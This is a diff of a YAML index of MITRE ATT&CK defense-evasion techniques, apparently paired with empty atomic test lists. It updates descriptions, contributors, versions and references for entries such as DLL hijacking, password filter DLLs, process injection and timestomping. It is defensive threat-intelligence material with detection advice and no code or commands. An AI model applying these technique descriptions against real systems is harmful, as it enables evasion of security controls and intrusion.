         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2484,8 +2550,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3131,7 +3192,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3426,15 +3496,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
